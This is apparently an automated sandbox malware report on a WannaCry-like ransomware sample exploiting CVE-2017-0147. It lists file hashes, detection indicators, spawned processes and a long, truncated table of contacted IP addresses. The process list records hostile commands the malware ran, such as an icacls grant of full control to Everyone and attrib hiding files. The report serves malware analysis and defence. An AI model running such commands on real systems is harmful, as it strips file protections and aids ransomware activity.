~ER1AFA.tmp Size 1MiB (1091584 bytes) Type peexe executable Description PE32 executable (console) Intel 80386, for MS Windows AV Scan Result Labeled as "Trojan.Generic" (43/53) Runtime Process c9b65b764985dfd7a11d3faf599c56b8.exe (PID: 2084) MD5 1c91b0e3cf2e908f8ba10e7a4c741eb4 SHA1 116a619f191ef1daf7fb65a3d586fc4a87c364f5 SHA256 2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5
~ER24B7.tmp Size 225KiB (229888 bytes) Type pedll executable Description PE32 executable (DLL) (GUI) Intel 80386, for MS Windows AV Scan Result Labeled as "Gen:Trojan.Heur.LP" (37/50) Runtime 
Process sysprep.exe (PID: 3272) MD5 9b9a0edd4e8403b14badd659394ab491 SHA1 27b92ff5daa09d95afede6d86419a891a7906d95 SHA256 b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c
Informative Selection2
ud.bat Size 208B (208 bytes) Type text Description DOS batch file, ASCII text, with CRLF line terminators Runtime Process c9b65b764985dfd7a11d3faf599c56b8.exe (PID: 2084) MD5 83150164748876663b1561a516305d15 SHA1 19089f812ffa007b4ab564c96544cebc767eadb3 SHA256 3fe77779a8d7c0b4f90489dd7a216f45fa101665b26201bea4ecd6c2108ea77f
desktop.ini Size Unknown (0 bytes) Type empty Runtime Process iexplore.exe (PID: 2672)
Informative7
RecoveryStore.{B4365893-6E19-11E8-989D-0A00278A626A}.dat {B4365894-6E19-11E8-989D-0A00278A626A}.dat ~13785.tmp diagerr.xml diagwrn.xml Size 1.9KiB (1908 bytes) Type text Description UTF-8 Unicode (with BOM) text Runtime Process sysprep.exe (PID: 3272) MD5 d1e75542ec8d1b4851765a57ac63618e SHA1 a231451f545d3133e5d6a0487a59c5dbd01ee50e SHA256 6c06bf950d0fe3476e020cd363ec0c8c9d4ee0fc89a24c50780c44e6453995c6 setupact.log setuperr.log
© 2019 Hybrid Analysis
malicious Threat Score: 100/100 AV Detection: 85% Labeled as: CVE-2017-0147 2a8efbfadd798f6111340f7c1c956bee This report is generated from a file or URL submitted to this webservice on May 30th 2018 16:29:22 (CEST) and action script Heavy Anti-Evasion Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1 Report generated by Falcon Sandbox v8.10 © Hybrid Analysis
Incident Response Risk Assessment Remote Access Reads terminal service related keys (often RDP related) Uses network protocols on unusual ports Persistence Grants permissions using icacls (DACL modification) Spawns a lot of processes Writes data to a remote process Fingerprint Reads the active computer name Reads the cryptographic machine GUID Spreading Detected a large number of ARP broadcast requests (network device lookup) Network Behavior Contacts 1 domain and 3088 hosts.
Indicators Not all malicious and suspicious indicators are displayed.
Malicious Indicators (20)

External Systems
- Detected Suricata Alert
- Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- Sample was identified as malicious by a large number of Antivirus engines
- Sample was identified as malicious by at least one Antivirus engine

General
- The analysis extracted a file that was identified as malicious
- The analysis spawned a process that was identified as malicious

Installation/Persistence
- Allocates virtual memory in a remote process
- Writes data to a remote process

Network Related
- Contacts very many different hosts
- Detected a large number of ARP broadcast requests (network device lookup)
- Malicious artifacts seen in the context of a contacted host
- Uses network protocols on unusual ports

Pattern Matching
- YARA signature match

System Security
- Modifies the access control lists of files

Unusual Characteristics
- Checks for a resource fork (ADS) file
- Spawns a lot of processes

(4 further malicious indicators are shown only in the private webservice or standalone version.)

Suspicious Indicators (25)

Anti-Detection/Stealthiness
- Contains ability to open/control a service
- Queries kernel debugger information
- Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)

Anti-Reverse Engineering
- PE file has unusual entropy sections

Environment Awareness
- Reads the active computer name
- Reads the cryptographic machine GUID

External Systems
- Found an IP/URL artifact that was identified as malicious by at least one reputation engine

General
- Contains ability to find and load resources of a specific module

Installation/Persistence
- Drops executable files

Network Related
- Detected increased number of ARP broadcast requests (network device lookup)
- Found potential IP address in binary/memory

Pattern Matching
- Contains ability to download files from the internet

Ransomware/Banking
- Contains many references to file extensions (often found in ransomware)

Remote Access Related
- Reads terminal service related keys (often RDP related)

System Destruction
- Marks file for deletion
- Opens file with deletion access rights

System Security
- Modifies proxy settings

Unusual Characteristics
- Imports suspicious APIs
- Installs hooks/patches the running process

(6 further suspicious indicators are shown only in the private webservice or standalone version.)

Informative (15)

Environment Awareness
- Possibly tries to detect the presence of a debugger

General
- Contacts domains
- Contacts server
- Creates mutants
- GETs files from a webserver
- Process launched with changed environment
- Spawns new processes
- The input sample possibly contains the RDTSCP instruction

Installation/Persistence
- Dropped files
- Touches files in the Windows directory

Network Related
- Found potential URL in binary/memory

System Security
- Creates or modifies windows services
- Opens the Kernel Security Device Driver (KsecDD) of Windows

Unusual Characteristics
- Matched Compiler/Packer signature
- Reads information about supported languages

File Details

Filename: 2a8efbfadd798f6111340f7c1c956bee
Size: 5MiB (5267459 bytes)
Type: pedll executable
Description: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Architecture: WINDOWS
SHA256: 22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6
Compiler/Packer: Microsoft visual C++ 6.0 DLL
Resources Language: ENGLISH
Visualization: Input File (PortEx) PE visualization (image not reproduced)

Classification (TrID)
- 67.3% (.EXE) Win32 Executable MS Visual C++ (generic)
- 14.2% (.DLL) Win32 Dynamic Link Library (generic)
- 9.7% (.EXE) Win32 Executable (generic)
- 4.3% (.EXE) Generic Win/DOS Executable
- 4.3% (.EXE) DOS Executable Generic

File Compositions (Imported Objects, File Analysis)
- 3 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 8168)
- 1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 1720)
- 1 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)
- 3 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 4035)

File Sections

Name    Entropy          Virtual Address  Virtual Size  Raw Size  MD5
.text   1.44299712447    0x1000           0x28c         0x1000    8de9a2cb31e4c74bd008b871d14bfafc
.rdata  0.734601813362   0x2000           0x1d8         0x1000    3dd394f95ab218593f2bc8eb65184db4
.data   0.0852386864133  0x3000           0x154         0x1000    fe5022c5b5d015ad38b2b77fc437a5cb
.rsrc   6.10865289671    0x4000           0x500060      0x501000  f016d5edc700b1685a0bdcec7c83cea4
.reloc  0                0x505000         0x2ac         0x1000    620f0b67a91f7f74151bc5be745b7110

File Imports
Libraries: KERNEL32.dll, MSVCRT.dll
Functions: CloseHandle, CreateFileA, CreateProcessA, FindResourceA, LoadResource, LockResource, SizeofResource, WriteFile

Hybrid Analysis: Processes

Analysed 12 processes in total (System Resource Monitor).
- rundll32.exe "C:\2a8efbfadd798f6111340f7c1c956bee.dll",PlayGame (PID: 2388)
- mssecsvc.exe (PID: 2376)
- tasksche.exe /i (PID: 736) 58/66
- tasksche.exe (PID: 3032) 58/66
- attrib.exe attrib +h . (PID: 3372)
- icacls.exe icacls . /grant Everyone:F /T /C /Q (PID: 2972)
- attrib.exe attrib +h . (PID: 3744)
- icacls.exe icacls . /grant Everyone:F /T /C /Q (PID: 3732)
- mssecsvc.exe -m security (PID: 2368)
- tasksche.exe (PID: 2136) 58/66
- attrib.exe attrib +h . (PID: 2344)
- icacls.exe icacls . /grant Everyone:F /T /C /Q (PID: 2672)
- ... and some more processes with no relevance.
Network Analysis

DNS Requests
Domain: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Address: 104.17.40.137 (TTL: 299)
Registrar: NAMECHEAP INC
Name Server: BRUCE.NS.CLOUDFLARE.COM
Creation Date: Fri, 12 May 2017 00:00:00 GMT
Country: United States

Contacted Hosts

Displaying the first 1000 contacted hosts. The remaining 2088 entries are available in the full report, but download of the full report is disabled.

104.17.40.137  80/TCP  mssecsvc.exe (PID: 2376), mssecsvc.exe (PID: 2368)  United States

All hosts below were contacted by mssecsvc.exe (PID: 2368).

IP Address  Port/Protocol  Country
41.140.144.229  63894/TCP  Morocco
70.104.219.196  63907/TCP  United States
27.226.17.13  63915/TCP  China
66.59.179.216  63919/TCP  Canada
93.104.128.203  63928/TCP  Germany
27.79.216.46  63931/TCP  Viet Nam
138.220.153.64  63939/TCP  United States
8.185.167.2  63940/TCP  United States
221.74.189.40  63943/TCP  Japan
158.122.188.35  63952/TCP  United States
47.246.198.1  63954/TCP  United States
43.100.114.153  63957/TCP  Japan
78.105.95.52  63965/TCP  United Kingdom
96.69.251.55  63968/TCP  United States
60.102.99.16  63970/TCP  Japan
152.104.244.150  63972/TCP  China
152.213.60.160  63980/TCP  United States
1.23.9.46  63985/TCP  India
86.65.210.178  63986/TCP  France
162.85.217.157  63989/TCP  Canada
208.110.147.55  63995/TCP  United States
22.201.149.45  63996/TCP  United States
140.16.131.208  64001/TCP  United States
150.66.208.64  64002/TCP  Japan
143.225.183.27  64006/TCP  Italy
164.158.164.141  64011/TCP  United States
109.243.206.29  64013/TCP  Poland
182.94.167.7  64017/TCP  India
92.26.237.228  64019/TCP  United Kingdom
47.225.124.196  64023/TCP  United States
161.185.187.238  64026/TCP  United States
183.109.77.34  64028/TCP  Korea, Republic of
198.166.53.97  64032/TCP  Canada
99.204.97.153  64036/TCP  United States
104.221.73.178  64037/TCP  Canada
152.184.109.163  64042/TCP  United States
160.124.204.92  64043/TCP  South Africa
51.228.114.57  64046/TCP  United Kingdom
143.81.20.200  64050/TCP  United States
139.116.66.184  64054/TCP  Norway
140.227.23.108  64056/TCP  Japan
113.204.142.0  64059/TCP  China
59.32.186.179  64060/TCP  China
181.49.247.174  64062/TCP  Colombia
24.236.246.74  64065/TCP  United States
212.211.59.72  64068/TCP  United Kingdom
89.153.13.102  64074/TCP  Portugal
201.137.111.73  64075/TCP  Mexico
158.72.17.85  64077/TCP  United States
77.32.134.104  64079/TCP  Poland
217.43.232.159  64080/TCP  United Kingdom
159.165.236.177  64085/TCP  United States
191.70.55.199  64087/TCP  Colombia
194.70.78.46  64092/TCP  United Kingdom
214.117.225.188  64094/TCP  United States
14.206.83.138  64095/TCP  Korea, Republic of
85.234.40.227  64097/TCP  Russian Federation
194.195.248.125  64098/TCP  Germany
9.39.235.76  64101/TCP  United States
135.170.147.185  64104/TCP  United States
158.109.83.241  64108/TCP  Spain
53.84.31.105  64113/TCP  Germany
59.51.251.120  64114/TCP  China
18.23.141.242  64115/TCP  United States
34.154.55.28  64117/TCP  United States
123.211.105.225  64119/TCP  Australia
135.156.127.250  64122/TCP  United States
118.142.186.196  64125/TCP  Hong Kong
9.113.250.242  64128/TCP  United States
43.79.150.31  64129/TCP  Japan
6.57.116.91  64132/TCP  United States
167.170.186.35  64134/TCP  United States
75.146.253.239  64135/TCP  United States
154.1.142.55  64136/TCP  United States
9.181.223.212  64139/TCP  United States
103.87.125.234  64142/TCP  Sri Lanka
114.114.183.45  64145/TCP  China
51.208.106.81  64147/TCP  United Kingdom
199.151.110.112  64149/TCP  United States
216.164.99.136  64151/TCP  United States
112.250.61.157  64153/TCP  China
171.46.48.199  64154/TCP  China
89.119.42.217  64156/TCP  Italy
126.204.79.107  64159/TCP  Japan
215.254.197.247  64161/TCP  United States
133.117.20.228  64166/TCP  Japan
126.213.47.130  64167/TCP  Japan
120.108.74.237  64171/TCP  Taiwan; Republic of China (ROC)
15.159.214.54  64172/TCP  United States
173.35.45.34  64174/TCP  Canada
24.162.174.109  64175/TCP  United States
210.252.69.155  64177/TCP  Japan
190.14.10.65  64180/TCP  Argentina
176.170.23.123  64182/TCP  France
153.253.197.109  64183/TCP  Japan
150.102.247.236  64188/TCP  United States
203.65.60.40  64189/TCP  Taiwan; Republic of China (ROC)
178.80.23.2  64192/TCP  Saudi Arabia
193.214.180.155  64193/TCP  Norway
13.181.230.220  64196/TCP  United States
9.38.48.18  64198/TCP  United States
34.154.88.212  64199/TCP  United States
199.92.0.167  64202/TCP  United States
198.74.181.9  64203/TCP  United States
42.48.68.235  64206/TCP  China
199.174.222.89  64207/TCP  United States
72.104.13.45  64212/TCP  United States
69.215.70.230  64213/TCP  United States
211.162.154.136  64215/TCP  China
112.19.68.7  64216/TCP  China
4.46.199.78  64219/TCP  United States
60.111.216.174  64221/TCP  Japan
48.94.43.251  64224/TCP  United States
170.163.243.21  64225/TCP  United States
197.56.35.157  64228/TCP  Egypt
151.132.127.26  64231/TCP  United States
188.103.135.114  64233/TCP  Germany
74.232.108.85  64236/TCP  United States
218.215.235.98  64237/TCP  Australia
217.78.127.8  64239/TCP  Switzerland
210.16.140.201  64240/TCP  China
34.58.8.152  64244/TCP  United States
16.45.186.90  64245/TCP  United States
16.185.50.242  64246/TCP  United States
178.133.97.123  64247/TCP  Ukraine
98.193.42.197  64248/TCP  United States
89.66.222.109  64249/TCP  Poland
28.247.92.246  64252/TCP  United States
104.56.169.220  64254/TCP  United States
38.230.239.86  64258/TCP  United States
102.177.40.141  64259/TCP  South Africa
86.111.193.43  64261/TCP  Saudi Arabia
118.251.201.207  64262/TCP  China
48.54.143.206  64265/TCP  United States
2.163.198.235  64266/TCP  Germany
16.93.214.139  64267/TCP  United States
204.141.142.178  64268/TCP  United States
22.62.245.9  64269/TCP  United States
145.83.156.100  64270/TCP  Netherlands
96.205.182.92  64273/TCP  United States
122.188.184.109  64274/TCP  China
26.81.156.214  64279/TCP  United States
84.55.180.229  64280/TCP  France
181.247.125.20  64282/TCP  Colombia
29.33.152.9  64284/TCP  United States
13.125.180.91  64290/TCP  United States
96.197.172.11  64291/TCP  United States
159.231.86.189  64292/TCP  Canada
169.171.254.25  64293/TCP  United States
173.11.128.180  64294/TCP  United States
36.132.31.22  64295/TCP  China
35.23.189.14  64297/TCP  United States
46.157.184.54  64299/TCP  Norway
40.199.66.13  64301/TCP  United States
101.22.112.126  64304/TCP  China
141.31.145.59  64305/TCP  Germany
217.30.149.1  64309/TCP  Poland
66.106.7.118  64311/TCP  United States
98.234.201.226  64314/TCP  United States
145.203.212.111  64315/TCP  Netherlands
100.70.7.196  64316/TCP  Reserved
29.62.92.19  64317/TCP  United States
77.127.29.161  64319/TCP  Israel
151.231.218.95  64320/TCP  United Kingdom
167.228.69.213  64322/TCP  United States
166.94.167.21  64323/TCP  United States
68.125.136.230  64324/TCP  United States
52.240.60.46  64325/TCP  United States
20.196.98.15  64326/TCP  United States
169.83.194.98  64327/TCP  United States
48.28.131.14  64328/TCP  United States
205.27.170.10  64329/TCP  United States
95.212.244.87  64330/TCP  Egypt
155.7.7.18  64331/TCP  United States
120.135.158.162  64332/TCP  China
22.140.133.202  64333/TCP  United States
86.151.109.123  64334/TCP  United Kingdom
25.163.21.174  64335/TCP  United Kingdom
47.204.199.25  64336/TCP  United States
125.24.104.119  64337/TCP  Thailand
222.12.155.200  64338/TCP  Japan
149.245.176.4  64339/TCP  Germany
14.205.221.118  64340/TCP  China
53.238.158.160  64341/TCP  Germany
191.108.182.215  64342/TCP  Colombia
119.116.49.47  64343/TCP  China
134.17.18.80  64344/TCP  Belarus
151.206.198.91  64345/TCP  United States
78.160.89.174  64346/TCP  Turkey
208.31.199.109  64348/TCP  United States
164.7.112.80  64349/TCP  France
129.108.73.230  64350/TCP  United States
74.73.52.39  64351/TCP  United States
175.230.118.46  64352/TCP  Korea, Republic of
96.41.191.110  64353/TCP  United States
45.237.3.177  64354/TCP  Paraguay
7.200.181.190  64355/TCP  United States
38.228.74.88  64356/TCP  United States
217.21.24.189  64357/TCP  Hungary
98.92.26.95  64358/TCP  United States
12.103.164.5  64359/TCP  United States
74.247.116.157  64361/TCP  United States
208.113.120.128  64362/TCP  United States
78.2.52.217  64363/TCP  Croatia (local name: Hrvatska)
68.135.72.177  64364/TCP  United States
93.76.85.27  64365/TCP  Ukraine
56.211.137.103  64366/TCP  United States
134.163.58.227  64367/TCP  United States
18.32.209.61  64368/TCP  United States
138.118.135.186  64369/TCP  Brazil
222.46.174.102  64370/TCP  China
139.90.103.190  64371/TCP  Belgium
95.213.137.49  64372/TCP  Russian Federation
187.25.118.92  64373/TCP  Brazil
121.5.23.63  64374/TCP  China
222.16.71.245  64375/TCP  China
76.62.205.140  64376/TCP  United States
197.105.104.11  64377/TCP  South Africa
100.46.132.122  64378/TCP  United States
121.221.155.243  64379/TCP  Australia
82.113.206.226  64380/TCP  Italy
155.99.209.144  64381/TCP  United States
131.76.159.207  64382/TCP  United States
106.68.108.231  64383/TCP  Australia
22.144.183.167  64384/TCP  United States
168.65.73.5  64385/TCP  United States
204.91.64.153  64386/TCP  United States
205.163.238.233  64387/TCP  United States
148.235.238.86  64388/TCP  Mexico
171.9.206.22  64389/TCP  China
112.173.180.111  64390/TCP  Korea, Republic of
138.153.4.140  64391/TCP  United States
210.160.110.189  64392/TCP  Japan
192.174.139.162  64393/TCP  Japan
207.120.28.47  64394/TCP  United States
30.89.136.83  64395/TCP  United States
41.10.35.115  64396/TCP  South Africa
3.99.174.252  64397/TCP  United States
16.185.94.65  64398/TCP  United States
113.32.225.241  64399/TCP  Japan
31.102.66.39  64400/TCP  United Kingdom
129.83.157.17  64401/TCP  United States
206.86.81.159  64402/TCP  United States
60.11.59.242  64403/TCP  China
82.128.80.220  64404/TCP  Nigeria
185.198.35.124  64405/TCP  Lithuania
136.129.139.119  64406/TCP  United States
66.3.75.136  64407/TCP  United States
76.204.91.15  64408/TCP  United States
106.25.176.28  64409/TCP  China
80.50.189.225  64410/TCP  Poland
165.210.23.132  64411/TCP  Cameroon
119.199.240.72  64412/TCP  Korea, Republic of
201.13.217.152  64413/TCP  Brazil
45.100.90.117  64414/TCP  Egypt
168.100.130.12  64415/TCP  United States
66.87.20.108  64416/TCP  United States
123.224.79.122  64417/TCP  Japan
21.80.190.213  64418/TCP  United States
61.231.105.144  64419/TCP  Taiwan; Republic of China (ROC)
91.32.213.120  64420/TCP  Germany
70.31.76.22  64421/TCP  Canada
146.12.118.109  64422/TCP  United States
57.201.49.159  64423/TCP  Belgium
20.58.167.214  64424/TCP  United States
2.139.5.115  64425/TCP  Spain
134.208.57.227  64426/TCP  Taiwan; Republic of China (ROC)
175.172.136.38  64427/TCP  China
166.190.227.97  64428/TCP  United States
125.150.183.29  64429/TCP  Korea, Republic of
74.240.216.231  64430/TCP  United States
54.143.66.205  64431/TCP  United States
64.85.50.5  64432/TCP  Canada
110.221.210.80  64433/TCP  China
61.152.114.171  64434/TCP  China
17.100.193.49  64435/TCP  United States
27.164.46.116  64436/TCP  Korea, Republic of
15.155.150.7  64437/TCP  United States
212.85.156.158  64438/TCP  France
52.83.154.39  64439/TCP  China
129.178.234.138  64440/TCP  Sweden
4.215.100.179  64441/TCP  United States
71.224.68.40  64442/TCP  United States
150.93.132.96  64443/TCP  Japan
43.252.136.251  64444/TCP  Indonesia
139.45.155.11  64445/TCP  United States
31.138.201.235  64446/TCP  Netherlands
62.249.80.209  64448/TCP  Austria
25.97.41.79  64449/TCP  United Kingdom
88.87.154.112  64450/TCP  Spain
55.101.128.14  64451/TCP  United States
41.138.67.254  64452/TCP  South Africa
31.251.221.192  64453/TCP  Germany
9.87.143.8  64454/TCP  United States
192.69.154.85  64455/TCP  United States
176.244.64.146  64456/TCP  Italy
144.112.188.43  64457/TCP  United States
22.184.131.200  64458/TCP  United States
190.65.104.226  64459/TCP  Colombia
71.189.30.100  64460/TCP  United States
87.19.34.169  64461/TCP  Italy
31.234.20.160  64462/TCP  Germany
112.157.1.62  64463/TCP  Korea, Republic of
50.32.231.245  64464/TCP  United States
36.164.228.183  64465/TCP  China
176.158.96.30  64466/TCP  France
31.82.203.167  64467/TCP  United Kingdom
94.249.236.238  64468/TCP  Germany
220.211.81.248  64469/TCP  Japan
43.237.210.242  64470/TCP  China
198.211.49.92  64471/TCP  United States
69.238.145.176  64472/TCP  United States
39.189.8.113  64473/TCP  China
121.75.68.251  64474/TCP  New Zealand
78.30.24.82  64475/TCP  Spain
171.45.2.172  64476/TCP  China
83.89.148.234  64477/TCP  Denmark
180.183.231.144  64478/TCP  Thailand
24.203.93.39  64479/TCP  Canada
84.73.149.121  64480/TCP  Switzerland
104.25.164.67  64481/TCP  United States
177.156.116.224  64482/TCP  Brazil
112.186.160.173  64483/TCP  Korea, Republic of
143.84.213.113  64484/TCP  United States
151.174.188.150  64485/TCP  United States
15.186.29.253  64486/TCP  United States
8.22.152.70  64487/TCP  United States
85.69.112.49  64488/TCP  France
160.34.78.96  64489/TCP  United States
81.185.200.197  64490/TCP  France
84.236.17.35  64491/TCP  Hungary
166.237.31.223  64492/TCP  United States
201.125.59.7  64493/TCP  Mexico
201.204.246.70  64494/TCP  Costa Rica
81.9.58.165  64495/TCP  Russian Federation
223.221.55.221  64496/TCP  China
168.175.213.25  64497/TCP  United States
175.154.86.16  64498/TCP  China
41.104.111.70  64499/TCP  Algeria
42.215.78.28  64500/TCP  China
192.40.139.212  64501/TCP  Canada
187.82.43.42  64502/TCP  Brazil
88.224.28.219  64503/TCP  Turkey
37.174.252.30  64504/TCP  France
119.206.85.73  64505/TCP  Korea, Republic of
61.235.222.183  64506/TCP  China
190.137.229.68  64507/TCP  Argentina
18.251.133.53  64508/TCP  United States
16.166.0.110  64509/TCP  United States
151.90.247.10  64510/TCP  Italy
22.133.129.105  64511/TCP  United States
151.191.149.89  64512/TCP  United States
82.83.214.172  64513/TCP  Germany
201.19.18.144  64514/TCP  Brazil
109.183.162.0  64515/TCP  Czech Republic
69.126.103.173  64516/TCP  United States
139.85.148.206  64517/TCP  United States
7.16.239.67  64518/TCP  United States
219.193.78.131  64519/TCP  Japan
168.106.176.71  64520/TCP  Hong Kong
152.123.133.185  64521/TCP  United States
168.116.55.209  64522/TCP  United States
90.146.87.8  64523/TCP  Austria
212.166.90.187  64524/TCP  Spain
106.104.80.17  64525/TCP  Taiwan; Republic of China (ROC)
199.79.144.208  64526/TCP  United States
80.164.2.146  64527/TCP  Denmark
222.183.209.150  64528/TCP  China
122.31.67.29  64529/TCP  Japan
44.80.120.117  64530/TCP  United States
159.188.165.33  64531/TCP  United States
103.32.145.154  64532/TCP  China
215.92.49.8  64533/TCP  United States
20.84.109.135  64534/TCP  United States
201.250.85.3  64535/TCP  Argentina
100.237.238.60  64536/TCP  United States
147.9.248.157  64537/TCP  United States
33.66.182.242  64538/TCP  United States
53.195.112.180  64539/TCP  Germany
153.71.55.237  64540/TCP  United States
107.248.184.158  64541/TCP  United States
141.136.181.159  64542/TCP  Croatia (local name: Hrvatska)
32.208.118.230  64543/TCP  United States
56.78.45.60  64544/TCP  United States
73.35.67.83  64545/TCP  United States
5.122.151.201  64546/TCP  Iran (Islamic Republic of)
196.27.65.138  64547/TCP  Mauritius
211.93.22.111  64548/TCP  China
204.95.195.29  64549/TCP  United States
58.197.210.197  64550/TCP  China
109.232.241.48  64551/TCP  Poland
75.173.144.205  64552/TCP  United States
12.38.159.33  64553/TCP  United States
93.238.163.215  64554/TCP  Germany
16.246.207.49  64555/TCP  United States
47.175.55.164  64556/TCP  United States
83.186.227.61  64557/TCP  Sweden
206.182.99.216  64558/TCP  United States
31.107.20.155  64559/TCP  United Kingdom
104.229.105.227  64560/TCP  United States
136.96.19.54  64561/TCP  United States
174.207.38.230  64562/TCP  United States
51.139.149.100  64563/TCP  United Kingdom
14.73.43.77  64564/TCP  Korea, Republic of
94.96.74.193  64565/TCP  Saudi Arabia
27.106.206.243  64566/TCP  China
175.21.13.142  64567/TCP  China
219.176.124.168  64568/TCP  Japan
155.59.218.59  64569/TCP  New Zealand
215.172.118.176  64570/TCP  United States
28.119.158.35  64571/TCP  United States
2.173.137.231  64572/TCP  Germany
111.30.113.63  64573/TCP  China
81.48.112.21  64574/TCP  France
105.187.50.91  64575/TCP  South Africa
47.28.51.98  64576/TCP  United States
70.11.244.125  64577/TCP  United States
167.0.224.119  64578/TCP  Colombia
201.48.85.93  64579/TCP  Brazil
1.33.88.12  64580/TCP  Japan
13.162.244.79  64581/TCP  United States
192.155.152.61  64582/TCP  United States
157.197.156.218  64583/TCP  Korea, Republic of
186.68.167.210  64584/TCP  Ecuador
214.29.170.143  64585/TCP  United States
States 208.174.93.123 64586 TCP mssecsvc.exe PID: 2368 Flag of United States United States 81.99.226.107 64587 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 220.74.133.87 64588 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 21.109.207.91 64589 TCP mssecsvc.exe PID: 2368 Flag of United States United States 51.83.70.191 64590 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 213.1.99.216 64591 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 201.153.185.82 64592 TCP mssecsvc.exe PID: 2368 Flag of Mexico Mexico 28.110.40.11 64593 TCP mssecsvc.exe PID: 2368 Flag of United States United States 46.67.206.170 64594 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 45.28.87.80 64595 TCP mssecsvc.exe PID: 2368 Flag of United States United States 19.233.0.229 64596 TCP mssecsvc.exe PID: 2368 Flag of United States United States 30.204.87.133 64597 TCP mssecsvc.exe PID: 2368 Flag of United States United States 15.113.218.72 64598 TCP mssecsvc.exe PID: 2368 Flag of United States United States 178.193.142.122 64599 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 179.119.8.251 64600 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 222.100.52.142 64601 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 203.231.233.179 64602 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 101.60.92.190 64603 TCP mssecsvc.exe PID: 2368 Flag of India India 133.72.225.140 64604 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 105.165.122.240 64606 TCP mssecsvc.exe PID: 2368 Flag of Kenya Kenya 191.175.23.203 64607 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 168.3.56.90 64608 TCP mssecsvc.exe PID: 2368 Flag of United States United States 170.3.160.37 64609 TCP mssecsvc.exe PID: 2368 Flag of United States United States 214.57.236.225 64610 TCP mssecsvc.exe PID: 2368 Flag of United States United States 222.203.204.146 64611 TCP mssecsvc.exe PID: 2368 Flag of China China 
33.85.207.53 64612 TCP mssecsvc.exe PID: 2368 Flag of United States United States 169.139.22.180 64613 TCP mssecsvc.exe PID: 2368 Flag of United States United States 158.181.1.202 64614 TCP mssecsvc.exe PID: 2368 Flag of Kyrgyzstan Kyrgyzstan 96.22.191.185 64615 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 52.99.40.191 64616 TCP mssecsvc.exe PID: 2368 Flag of United States United States 18.34.143.176 64617 TCP mssecsvc.exe PID: 2368 Flag of United States United States 42.51.131.158 64618 TCP mssecsvc.exe PID: 2368 Flag of China China 183.208.174.35 64619 TCP mssecsvc.exe PID: 2368 Flag of China China 63.214.201.218 64620 TCP mssecsvc.exe PID: 2368 Flag of United States United States 129.107.71.37 64621 TCP mssecsvc.exe PID: 2368 Flag of United States United States 200.0.183.28 64622 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 92.100.51.134 64623 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 47.37.75.180 64624 TCP mssecsvc.exe PID: 2368 Flag of United States United States 208.86.194.122 64625 TCP mssecsvc.exe PID: 2368 Flag of United States United States 99.208.246.16 64626 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 90.72.167.116 64627 TCP mssecsvc.exe PID: 2368 Flag of France France 86.186.189.5 64628 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 41.231.151.96 64629 TCP mssecsvc.exe PID: 2368 Flag of Tunisia Tunisia 170.133.161.1 64630 TCP mssecsvc.exe PID: 2368 Flag of United States United States 201.3.9.160 64631 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 165.24.31.209 64632 TCP mssecsvc.exe PID: 2368 Flag of United States United States 49.48.37.133 64633 TCP mssecsvc.exe PID: 2368 Flag of Thailand Thailand 85.17.223.18 64634 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 84.136.67.249 64635 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 151.79.203.143 64636 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 2.149.174.204 64637 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 
140.32.87.193 64638 TCP mssecsvc.exe PID: 2368 Flag of United States United States 185.161.179.14 64639 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 102.235.188.254 64640 TCP mssecsvc.exe PID: 2368 Flag of Egypt Egypt 210.120.186.248 64641 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 196.59.21.145 64642 TCP mssecsvc.exe PID: 2368 Flag of Seychelles Seychelles 206.60.103.4 64643 TCP mssecsvc.exe PID: 2368 Flag of United States United States 92.2.202.26 64644 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 75.40.59.190 64645 TCP mssecsvc.exe PID: 2368 Flag of United States United States 94.137.202.196 64647 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 117.37.70.219 64648 TCP mssecsvc.exe PID: 2368 Flag of China China 188.184.230.75 64649 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 22.142.226.44 64650 TCP mssecsvc.exe PID: 2368 Flag of United States United States 201.191.0.63 64651 TCP mssecsvc.exe PID: 2368 Flag of Costa Rica Costa Rica 109.205.171.204 64652 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 193.29.180.86 64653 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 143.177.52.34 64654 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 42.204.68.105 64655 TCP mssecsvc.exe PID: 2368 Flag of China China 55.84.146.115 64656 TCP 